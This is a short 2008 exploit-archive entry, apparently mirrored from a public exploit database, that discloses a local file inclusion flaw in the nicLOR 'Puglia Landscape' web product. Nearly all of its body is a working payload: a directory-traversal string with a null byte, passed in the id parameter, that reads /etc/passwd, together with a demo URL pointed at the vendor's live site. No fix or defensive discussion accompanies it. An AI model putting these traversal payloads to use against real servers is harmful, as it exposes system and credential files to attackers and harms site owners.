[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : nicLOR Puglia Landscape (id) Local File Inclusion Vulnerability
# Published : 2008-11-04
# Author : StAkeR
# Previous Title : Vibro-CMS Multiple Remote SQL Injection Vulnerabilities
# Next Title : Joomla Component ProDesk 1.0/1.2 Local File Inclusion Vulnerability


/*
   ---------------------------------------------------
   Puglia_Landscape Local File Inclusion Vulnerability
   ---------------------------------------------------
   Discovered By StAkeR[at]hotmail[dot]it
   http://www.niclor.net/prodotti/Puglia_Landscape
   ---------------------------------------------------
   
   * Local File Inclusion
   * Note: Magic_Quotes_GPC Off
   
   - index.php?id=../../../../../../../[Local File and NullByte]
   - index.php?id=../../../../../../../etc/passwd%00
   
   * Demo
   - http://www.niclor.net/prodotti/Puglia_Landscape/index.php?id=../../../../../../../etc/passwd%00
 
   

*/

# www.Syue.com [2008-11-04]